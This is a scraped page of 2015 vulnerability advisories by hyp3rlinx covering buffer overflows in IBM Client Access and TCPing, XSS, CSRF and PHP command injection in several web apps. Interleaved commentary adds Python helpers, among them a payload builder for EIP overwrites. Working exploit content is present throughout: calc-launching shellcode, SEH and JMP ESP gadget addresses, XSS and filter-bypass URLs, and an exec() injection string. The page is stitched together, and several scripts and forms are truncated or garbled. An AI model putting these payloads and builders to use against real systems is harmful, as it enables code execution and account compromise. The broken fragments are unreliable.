pgm="C:\\Program Files (x86)\\IBM\\Client Access\\AFPViewr\\ftdwprt.exe  "

#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")


# use jmp or call esp in FTDBDT.dll under AFPViewer for Client Access
# mona finds ---> 0x638091df : jmp esp |  {PAGE_EXECUTE_READ} [FTDBDT.dll] ASLR: 
# False, Rebase: False, SafeSEH: False, OS: False, v2.05.04.00
# (C:\Program Files (x86)\IBM\Client Access\AFPViewr\FTDBDT.dll)

rp=struct.pack('
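Both this script and the FTPShell one earlier on the page stop at the struct.pack() call that packs the return address, which is also the step where the two numbers the advisories give come together: the offset at which the input reaches the saved EIP (2475 bytes for FTPShell, found by the "A"*2475 test whose crash shows eip=41414141) and the address of a JMP register gadget (0x638091df, the jmp esp mona reports in FTDBDT.dll for IBM i Access). The following is an added example, not either advisory's exploit: it builds the cyclic pattern that gives the offset directly from the crashed EIP value instead of by trial, packs the address little-endian, and lays out the payload for a JMP ESP gadget. The shellcode is a breakpoint stand-in, and the two worked values are kept as separate constants because they belong to different targets.

```python
import string
import struct


def pattern_create(length):
    """Cyclic pattern in the Metasploit/mona style (Aa0Aa1Aa2...): every 4-byte
    window is unique, so the value that lands in EIP identifies the offset."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]


def pattern_offset(length, value):
    """Offset of a crashed register value in the pattern; value is the int the
    debugger shows (e.g. 0x44356544) or the 4-character string. -1 if absent."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("latin-1")   # x86 is little-endian
    return pattern_create(length).find(value)


def pack_address(addr):
    """The 4 bytes that overwrite the saved EIP, least significant byte first."""
    return struct.pack("<I", addr)


def build_payload(offset, ret_addr, shellcode, nop_sled=16, total=None):
    """junk up to saved EIP | return address | NOP sled | shellcode.
    This layout suits a JMP ESP gadget: when it runs, ESP points just past the
    return address, i.e. at the sled. For a JMP ECX gadget (the FTPShell case)
    the shellcode goes wherever ECX points at crash time instead."""
    payload = b"A" * offset + pack_address(ret_addr) + b"\x90" * nop_sled + shellcode
    if total is not None and len(payload) < total:
        payload += b"C" * (total - len(payload))   # keep the size of the crash input
    return payload


FTPSHELL_EIP_OFFSET = 2475          # from the advisory's "A"*2475 + "R"*4 test
FTDBDT_JMP_ESP = 0x638091df         # mona's jmp esp in FTDBDT.dll (IBM i Access)
DEBUG_SHELLCODE = b"\xcc" * 4       # int3 stand-in for real shellcode

if __name__ == "__main__":
    # A crash with EIP=0x44356544 after sending pattern_create(3000) means offset 2475.
    print(pattern_offset(3000, 0x44356544))
    print(pack_address(FTDBDT_JMP_ESP).hex())
    print(len(build_payload(FTPSHELL_EIP_OFFSET, FTDBDT_JMP_ESP, DEBUG_SHELLCODE)))
```

Send pattern_create(n) where the advisories send "A"*n, read EIP from the debugger, and pattern_offset() returns the junk length; an "A"*n crash (EIP=41414141) cannot tell you that, which is why the cyclic pattern is the first thing to try.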

CF Image Host XSS

2015-11-14 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-XSS.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6



Vulnerability Type:
==
Cross site scripting - XSS



CVE Reference:
==
N/A



Vulnerability Details:
=

Multiple reflected XSS entry points exist allowing arbitrary client-side
browser code execution on victims who click our infected links, undermining
the trust between the client and server and possibly leading to information theft,
dropped malware, stolen session cookies etc...



XSS Exploit code(s):
===

1)
http://localhost/imagehost1.6.6/admin.php?act=images&orderBy=%22%20onMouseMove=%22alert%280%29

2) 
http://localhost/imagehost1.6.6/admin.php?act=edit&id=%22%20onMouseMove=%22alert%280%29


3) 
http://localhost/imagehost1.6.6/admin.php?act=images&ip=%22%20onMouseMove=%22alert%280%29
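The three CF Image Host URLs above, the Zenphoto 'tab', 'single' and 'error' payloads and the phpback 'query' form on this page all use the same break-out: the parameter is reflected inside a quoted HTML attribute, so a value starting with %22 closes it and the rest of the value becomes a new on* handler attribute. The following is an added example (not the code of any of those projects) that decodes such a URL the way the PHP page sees it, renders the value the vulnerable way and the fixed way, and checks which of the two introduced a handler. The URL is constructed after entry 1) above.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

ATTR_TEMPLATE = '<input type="hidden" name="%s" value="%s">'


def reflected_params(url):
    """Query parameters as the PHP page sees them (percent-decoded, '+' as space)."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def render_unsafe(name, value):
    """What the affected pages effectively do: drop the parameter into a quoted
    attribute as-is."""
    return ATTR_TEMPLATE % (name, value)


def render_safe(name, value):
    """Fix: entity-encode for an attribute context, quotes included."""
    return ATTR_TEMPLATE % (name, html.escape(value, quote=True))


NEW_HANDLER_RE = re.compile(r'"\s+on\w+\s*=', re.I)


def breaks_out_of_attribute(rendered):
    """True if the reflected value closed the attribute and added an on* handler."""
    return bool(NEW_HANDLER_RE.search(rendered))


# Constructed URL modelled on CF Image Host entry 1) above.
SAMPLE_URL = ("http://localhost/imagehost1.6.6/admin.php?act=images"
              "&orderBy=%22%20onMouseMove=%22alert%280%29")

if __name__ == "__main__":
    value = reflected_params(SAMPLE_URL)["orderBy"]
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render("orderBy", value)
        print(label, breaks_out_of_attribute(out), out)
```

html.escape() is the right tool only for this context (a double-quoted attribute or element text); a value that ends up inside a JavaScript string or an unquoted attribute needs a different encoder.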




Disclosure Timeline:
=
Vendor Notification:  NA
November 14, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:

Medium




Description:
=


Request Method(s):  [+] GET


Vulnerable Product: [+] CF Image Host 1.65 - 1.6.6


Vulnerable Parameter(s):[+] orderBy, id, ip



[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided 
that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and 
similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained 
herein and prohibits any malicious use of all security related information or 
exploits by the author or elsewhere.

by hyp3rlinx


CF Image Host PHP Command Injection

2015-11-14 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-PHP-CMD-INJECTION.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6


Vulnerability Type:
=
PHP Command Injection



CVE Reference:
==
N/A



Vulnerability Details:
=

CF Imagehost allows users who have access to the management area to write directly to the 'set.php' page under the /inc directory that stores setting values for the 'Site Title', 'Site Slogan' etc. This allows a local attacker the ability to inject specially crafted PHP command payloads to execute arbitrary operating system commands on the victim host, possibly leading to privilege escalation, RFI, backdoors etc.. and most likely full compromise of the affected system or shared environment if applicable.




PHP Command Injection Exploit code(s):
=

Under the settings tab we can inject the PHP code below and it will remain persistent as it is written to disk in 'set.php'; afterwards, when the victim visits the application and clicks a tab, the persistent OS command will be executed.


1) navigate to the CF Image Host settings tab 
http://localhost/imagehost1.6.6/admin.php?act=set
2) click on the admin menu on the left and enter your passwords, DO NOT click 'Save changes' yet! or you get an error message to enter creds
3) now go back to the settings tab and click 'General', then inject the PHP code below into the 'Site Title' input field
4) now click 'Save Changes'; this code will get stored under the /inc directory within the 'set.php' PHP file.

Our PHP injection payload needs the single quotes, double backslashes and semicolons as described below to correctly escape the syntax so we do not break the PHP page and cause errors; our extra \\ quotes and ; get removed after injection takes place.

some examples...


';echo exec("c:\\Windows\\system32\\calc.exe");'';';

'set.php' on line 11 then becomes:
$settings['SET_TITLE'] = '';echo exec("c:\Windows\system32\calc.exe");'';';';

OR inject CMD to launch chrome.exe etc...

';echo exec("c:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe");'';';

  
After, click on some of the tabs above like 'Database' or 'Ban User' and Tada! this will execute our stored PHP command, either running calc.exe or launching Google Chrome.
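As an added example (not the advisory's or CF Image Host's own code), the Python below reconstructs why splicing a setting straight into set.php is injectable and how a proper single-quoted-literal serializer closes it. The "naive" writer is my assumption of the vulnerable behaviour (the POST value is run through stripslashes() and concatenated between two quotes); it reproduces the set.php line quoted above, and the PHP-literal lexer at the end shows that the hardened writer leaves nothing but the assignment.

```python
"""Added example: reproduce the set.php injection and show the escaped
alternative.  The naive writer is an ASSUMED reconstruction of the vulnerable
behaviour, not CF Image Host's source; the payload is the one quoted in the
advisory."""

# The calc.exe payload exactly as it appears in the advisory (constructed input).
PAYLOAD = r"""';echo exec("c:\\Windows\\system32\\calc.exe");'';';"""


def php_stripslashes(s):
    """Mimic PHP's stripslashes(): drop each backslash, keep the char after it."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            i += 1
            if i >= len(s):
                break
        out.append(s[i])
        i += 1
    return "".join(out)


def naive_set_line(key, value):
    """ASSUMED vulnerable writer: unescape the POST value, then splice it
    between two quotes.  A quote inside the value ends the literal early."""
    return "$settings['%s'] = '%s';" % (key, php_stripslashes(value))


def php_single_quoted(value):
    """Serialize a string as a PHP single-quoted literal with the escaping
    var_export() applies: only backslash and the quote itself are special."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def safe_set_line(key, value):
    """Hardened writer: key and value both go through the serializer."""
    return "$settings[%s] = %s;" % (php_single_quoted(key), php_single_quoted(value))


def split_assignment(line):
    """Lex "$settings[...] = '<literal>'<rest>" the way PHP's parser would and
    return (decoded_value, rest).  A correctly escaped line leaves rest == ';';
    anything else means the value broke out of the literal and became code."""
    pos = line.index("= '") + 3           # first character inside the literal
    value = []
    while pos < len(line) and line[pos] != "'":
        if line[pos] == "\\" and pos + 1 < len(line) and line[pos + 1] in "\\'":
            pos += 1                      # \\ -> \ and \' -> ' inside '...'
        value.append(line[pos])
        pos += 1
    return "".join(value), line[pos + 1:]


def is_injected(line):
    """True when the generated line carries code beyond the string literal."""
    return split_assignment(line)[1] != ";"


if __name__ == "__main__":
    for writer in (naive_set_line, safe_set_line):
        line = writer("SET_TITLE", PAYLOAD)
        print("%-15s injected=%-5s %s" % (writer.__name__, is_injected(line), line))
```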



Disclosure Timeline:
=
Vendor Notification:  NA
November 13, 2015  : Public Disclosure



Exploitation Technique:
===
Local / Remote



Severity Level:

High



Description:


Request Method(s):[+] POST


Vulnerable Product:   [+] CF Image Host 1.65 - 1.6.6


Vulnerable Parameter(s):  [+] 'Site Title', 'Site Slogan' etc..


Affected Area(s): [+]  OS




by hyp3rlinx


CF Image Host CSRF

2015-11-14 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-CFIMAGEHOST-CSRF.txt



Vendor:

codefuture.co.uk/projects/imagehost



Product:
===
CF Image Host 1.65 - 1.6.6

Archive download listed as: version 1.65
unzips as imagehost 1.6.6



Vulnerability Type:
=
Cross site request forgery - CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=

No CSRF protection exists, allowing attackers to make requests to the server on behalf of the victim if they are logged in and visit a malicious site or click an infected linx. This will let attackers modify certain web application settings to whatever the attacker wishes.



CSRF Exploit code(s):



http://localhost/imagehost1.6.6/admin.php?act=set;>
http://hyp3rlinx.altervista.org; 
/>

document.getElementById('HELL').submit()

  



Disclosure Timeline:
=
Vendor Notification: NA
November 14, 2015  : Public Disclosure



Exploitation Technique:
===
Remote



Severity Level:

High



Description:



Request Method(s):[+] POST


Vulnerable Product:   [+] CF Image Host 1.65 - 1.6.6
 



by hyp3rlinx


Microsoft .NET Framework XSS / Elevation of Privilege CVE-2015-6099

2015-11-11 Thread apparitionsec
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-MICROSOFT-XSS-ELEVATION-OF-PRIVILEGE.txt



Vendor:
==
www.microsoft.com



Product:
===
Microsoft .NET Framework


Vulnerability Type:

XSS / Elevation of Privilege


CVE Reference:
==
CVE-2015-6099



Vulnerability Details:
==

Microsoft .NET Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

.NET Elevation of Privilege Vulnerability - CVE-2015-6099

An elevation of privilege vulnerability exists when ASP.NET improperly validates values in HTTP requests, exposing users to a potential cross-site scripting (XSS) attack. An attacker who successfully exploited the vulnerability could leverage a vulnerable website to inject client-side script into a user's browser and ultimately modify or spoof content, conduct phishing activities, disclose information, or perform any action on the vulnerable website that the target user has permission to perform. To exploit this vulnerability, user interaction is required. In a web-browsing scenario a user would have to navigate to a compromised website.

In an email attack scenario an attacker would have to convince a user who is logged on to a vulnerable server to click a specially crafted link in an email. The update addresses the vulnerability by modifying how ASP.NET validates the value of an HTTP request.

Microsoft received information about the vulnerability through coordinated vulnerability disclosure. At the time this security bulletin was originally issued, Microsoft was unaware of any attack attempting to exploit this vulnerability.

Microsoft has not identified any mitigating factors for this vulnerability.
Microsoft has not identified any workarounds for this vulnerability.

The following workarounds may be helpful in your situation:

Remove requestPathInvalidCharacters key from web.config
In order to work around this issue, administrators can remove the 
non-default setting from web.config, or at least include “:” in the 
requestPathInvalidCharacters setting.

How to undo the workaround: 
Restore the previously removed  
line.


https://technet.microsoft.com/library/security/MS15-118
http://www.symantec.com/security_response/vulnerability.jsp?bid=77479_rssid=sr-advisories
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6099



Disclosure Timeline:

Vendor Notification: August 15, 2015
November 10, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:


Request Method(s):  [+]  GET / POST 


Vulnerable Product versions:

Microsoft .NET Framework 4.0
Microsoft .NET Framework 4.5
Microsoft .NET Framework 4.5.1
Microsoft .NET Framework 4.5.2
Microsoft .NET Framework 4.6
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8 for x64-based Systems
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Vista SP2
Microsoft Windows Vista x64 Edition SP2


===


by hyp3rlinx


NXFilter v3.0.3 CSRF

2015-11-06 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-CSRF.txt



Vendor:

www.nxfilter.org/p2/



Product:

NXFilter v3.0.3



Vulnerability Type:
=
Cross site request forgery - CSRF



CVE Reference:
==
N/A



Vulnerability Details:
=
No CSRF protections exist, allowing us to make malicious HTTP requests on behalf of our victim. The server will then happily process any of the following actions if our victim clicks our infected linx or visits our malicious website while currently logged in to the vulnerable application.

1) "add arbitrary users"
2) "add or change SMTP settings"
3) "add arbitrary redirect domains"
4) "add arbitrary zone transfers"
5) "delete zone transfer domains"



Exploit code(s):
===


function doit(){
 var e=document.getElementById('HELL')
 e.submit()
}




1) CSRF add arbitrary users

http://localhost/user,user.jsp; method="post">


  
< and some persistent XSS!



2) CSRF add or change SMTP notification alerts

http://localhost/config,alert.jsp; method="post">



3) CSRF add arbitrary redirect domain
 
http://localhost/config,redirection.jsp; method="post">


4) CSRF add arbitrary zone transfers

http://localhost/config,zone_transfer.jsp; method="post">


5) CSRF delete zone transfer domains

http://localhost/config,zone_transfer.jsp?action_flag=delete=1

  

Disclosure Timeline:
==
Vendor Notification: October 18, 2015
November 5, 2015  : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:
==

Request Method(s):  [+] GET / POST


Vulnerable Product: [+] NXFilter v3.0.3


===


by hyp3rlinx


NXFilter v3.0.3 Persistent / Reflected XSS

2015-11-06 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-NXFILTER-XSS.txt



Vendor:

www.nxfilter.org/p2/



Product:

NXFilter v3.0.3



Vulnerability Type:
=
Persistent & Reflected XSS



CVE Reference:
==
N/A




Vulnerability Details:
=
Persistent & reflected XSS entry points exist allowing arbitrary client side browser code execution on victims who click our infected linx or visit persistently stored XSS payloads. XSS strings seem to get filtered, yet we can defeat that using JS String.fromCharCode() functions.



Exploit code(s):
===

1) persistent XSS under category / custom
   "name" parameter is vulnerable to persistent XSS injection using POST method.

http://localhost/category,custom.jsp



2) reflected XSS

http://localhost/classifier,ruleset.jsp?action_flag==1=%22/%3E%3Cscript%3Ealert%28666%29%3C/script%3E



3) reflected XSS

http://localhost/report,daily.jsp?stime=2015%2F10%2F17_option=yesterday=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2872%29%2bString.fromCharCode%2869%29%2bString.fromCharCode%2876%29%2bString.fromCharCode%2876%29%29%3C/script%3E




Disclosure Timeline:
===
Vendor Notification:  October 18, 2015
November 5, 2015 : Public Disclosure




Exploitation Technique:
===
Remote



Severity Level:
===
High



Description:
==
Request Method(s):  [+] GET / POST


Vulnerable Product: [+] NXFilter v3.0.3


Vulnerable Parameter(s):[+] name, user, kw



===


by hyp3rlinx


TCPing 2.1.0 Buffer Overflow

2015-11-02 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-TCPING-2.1.0-BUFFER-OVERFLOW.txt



Vendor:

Spetnik.com



Product:
=
Spetnik TCPing 2.1.0 / tcping.exe
circa 2007

TCPing "pings" a server on a specific port using TCP/IP by opening and closing a connection on the specified port. Results are returned in a similar fashion to that of Microsoft Windows Ping. This application is intended for use in testing for open ports on remote machines, or as an alternative to the standard "ping" in a case where ICMP packets are blocked or ignored.



Vulnerability Type:
===
Buffer Overflow



CVE Reference:
==
N/A




Vulnerability Details:
=

If TCPing is called with a specially crafted CL argument we will cause an exception and overwrite the pointers to the next SEH record and SEH handler with our buffer and malicious shellcode. No suitable POP POP RET address is available in TCPing as they start with null bytes 0x00 and will break our shellcode. However, TCPing is not compiled with SafeSEH, which is a linker option, so we can grab an address from another module that performs POP POP RET instructions to achieve arbitrary code execution on the victim's system.
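The advisory turns on TCPing having been linked without SafeSEH. As an added example (mine, not the advisory's code), the script below reads a PE32 image and reports whether it carries the SafeSEH handler table and the ASLR and DEP opt-ins, so a defender can audit which modules loaded into a process lack them. A minimal PE is constructed inline as test input; the SafeSEH criterion used (a non-empty SEHandlerTable in the load config, or the NO_SEH flag) is my simplification of the loader's check.

```python
"""Added example (not from the advisory): report whether a 32-bit PE was
linked with the mitigations whose absence the TCPing advisory relies on:
SafeSEH (a load-config SEHandlerTable), ASLR (DYNAMIC_BASE) and DEP
(NX_COMPAT).  build_sample_pe() constructs a minimal PE32 so the check runs
offline; pass open(path, 'rb').read() to inspect a real module."""
import struct
import sys

DYNAMIC_BASE = 0x0040   # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -> ASLR opt-in
NX_COMPAT = 0x0100      # IMAGE_DLLCHARACTERISTICS_NX_COMPAT   -> DEP opt-in
NO_SEH = 0x0400         # IMAGE_DLLCHARACTERISTICS_NO_SEH      -> registers no handlers
LOAD_CONFIG = 10        # IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG


def _sections(data, e_lfanew):
    """Yield (virtual_address, virtual_size, raw_size, raw_pointer) per section."""
    nsections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_of_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    base = e_lfanew + 24 + size_of_opt                # first IMAGE_SECTION_HEADER
    for i in range(nsections):
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, base + 40 * i + 8)
        yield va, vsize, rawsize, rawptr


def _rva_to_offset(rva, sections):
    """Translate an RVA to a file offset via the section table (headers map 1:1)."""
    for va, vsize, rawsize, rawptr in sections:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + rawptr
    return rva


def pe_mitigations(data):
    """Return {'aslr': bool, 'dep': bool, 'safeseh': bool} for a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 24                               # IMAGE_OPTIONAL_HEADER32
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 images use SafeSEH handler tables")
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    result = {
        "aslr": bool(dllchars & DYNAMIC_BASE),
        "dep": bool(dllchars & NX_COMPAT),
        # NO_SEH: the image registers no handlers, so none of its code can be
        # used as one; treated as equivalent to SafeSEH here.
        "safeseh": bool(dllchars & NO_SEH),
    }
    num_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    if num_dirs > LOAD_CONFIG:
        lc_rva = struct.unpack_from("<I", data, opt + 96 + 8 * LOAD_CONFIG)[0]
        if lc_rva:
            off = _rva_to_offset(lc_rva, list(_sections(data, e_lfanew)))
            # IMAGE_LOAD_CONFIG_DIRECTORY32: Size at 0x00, SEHandlerTable at
            # 0x40, SEHandlerCount at 0x44; shorter (older) structs lack them.
            if struct.unpack_from("<I", data, off)[0] >= 0x48:
                table, count = struct.unpack_from("<II", data, off + 0x40)
                if table and count:
                    result["safeseh"] = True
    return result


def build_sample_pe(dllchars, with_safeseh_table):
    """Construct a minimal single-section PE32 (constructed test input, not a
    real binary).  The .rdata section maps RVA 0x1000 to file offset 0x200,
    where an IMAGE_LOAD_CONFIG_DIRECTORY32 is placed."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x0102)   # i386, 1 section
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                             # PE32 magic
    struct.pack_into("<H", opt, 70, dllchars)                         # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG, 0x1000, 0x48)  # load config dir
    section = struct.pack("<8sIIII", b".rdata", 0x1000, 0x1000, 0x200, 0x200) + b"\0" * 16
    headers = dos + b"PE\0\0" + coff + bytes(opt) + section
    headers += b"\0" * (0x200 - len(headers))
    handlers = (0x1048, 1) if with_safeseh_table else (0, 0)          # table RVA, count
    load_config = struct.pack("<I", 0x48) + b"\0" * 0x3C + struct.pack("<II", *handlers)
    return headers + load_config + b"\0" * (0x200 - len(load_config))


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(0, False)
    for name, present in pe_mitigations(data).items():
        print("%-8s %s" % (name, "yes" if present else "NO"))
```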


stack dump...


EAX 0045
ECX 0040A750 tcping.0040A750
EDX 41414141
EBX 02CC
ESP 0018FA50
EBP 0018FA50
ESI 0018FD21 ASCII "rror: Unknown host AA
EDI 0018FCC8
EIP 0040270A tcping.0040270A
C 0  ES 002B 32bit 0()
P 1  CS 0023 32bit 0()
A 1  SS 002B 32bit 0()
Z 0  DS 002B 32bit 0()
S 0  FS 0053 32bit 7EFDD000(FFF)
T 0  GS 002B 32bit 0()
D 0
O 0  LastErr WSANO_DATA (2AFC)
EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)


WinDBG dump...


(17a8.149c): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for image0040
*** ERROR: Module load completed but symbols could not be loaded for 
image0040
eax=0045 ebx=0222 ecx=0040a750 edx=41414141 esi=0018fd21 edi=0018fcc8
eip=0040270a esp=0018fa50 ebp=0018fa50 iopl=0 nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010216
image0040+0x270a:
0040270a 8802mov byte ptr [edx],al  ds:002b:41414141=??



Exploit code(s):
===

Python script...


import struct,os,subprocess

#Spetnik TCPing Utility 2.1.0
#buffer overflow SEH exploit
#by hyp3rlinx 


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\tcping.exe "

nseh="\xEB\x06"+"\x90"*2  #JMP TO OUR SHELLCODE

seh=struct.pack('

PHP Server Monitor 3.1.1 Privilege Escalation

2015-10-29 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-PRIV-ESCALATE.txt



Vendor:

www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:

PHP Server Monitor 3.1.1


Vulnerability Type:
=
Privilege Escalation / CSRF



Vulnerability Details:
=

PHP Server Monitor uses level 20 for basic users and level 10 for Admins; these are stored in the database. Basic users can elevate their privileges to that of Administrator by crafting an HTTP payload changing their level to '10', then getting an Administrator to click an infected link or visit a malicious website to launch a CSRF attack which will grant the user admin access. This problem is due to no CSRF protection mechanism being in place. 




Exploit code(s):
===

1) privilege escalation / CSRF



function doit(){
var e=document.getElementById('HELL')
e.submit()
}


http://localhost/phpservermon-3.1.1/?=user=save=3; method="post">


Exploitation Technique:
===
Remote


Disclosure Timeline:
=
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure



Severity Level:
=
High



Description:
==


Request Method(s):  [+]  POST


Vulnerable Product: [+]  PHP Server Monitor 3.1.1
  


===


by hyp3rlinx


PHP Server Monitor 3.1.1 CSRF

2015-10-29 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt



Vendor:

www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download


Product:

PHP Server Monitor 3.1.1


Vulnerability Type:
=
Cross site request forgery (CSRF)




Vulnerability Details:
=

Multiple CSRF issues in PHP Server Monitor allow remote attackers to add arbitrary users & servers to the system, modify system configurations and delete arbitrary servers, if the user (admin) is logged in and visits our malicious website or clicks on our infected linxs. As no CSRF protection is used in the application, we can make requests on the victim's behalf and the server will happily oblige, processing our malicious HTTP requests.




Exploit code(s):
===


function doit(){
var e=document.getElementById('HELL')
e.submit()
}



1) add arbitrary users to the system:

http://localhost/phpservermon-3.1.1/?=user=save=0; method="post">


2) add arbitrary servers to the system:

http://localhost/phpservermon-3.1.1/?=server=save=0_to=; method="post">


3) modify system configuration:

http://localhost/phpservermon-3.1.1/index.php?mod=config=save; method="post">


4) arbitrary server deletion via GET request:

http://localhost/sectest/phpservermon-3.1.1/?=server=delete=2



Exploitation Technique:
===
Remote



Severity Level:
=
High



Disclosure Timeline:
=
Vendor Notification: NA
Oct 30, 2015  : Public Disclosure




Description:
==


Request Method(s):  [+]  GET / POST


Vulnerable Product: [+]  PHP Server Monitor 3.1.1
  


===


by hyp3rlinx


Blat.exe v2.7.6 SMTP / NNTP Mailer Buffer Overflow

2015-10-15 Thread apparitionsec
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  
http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt



Vendor:

www.blat.net
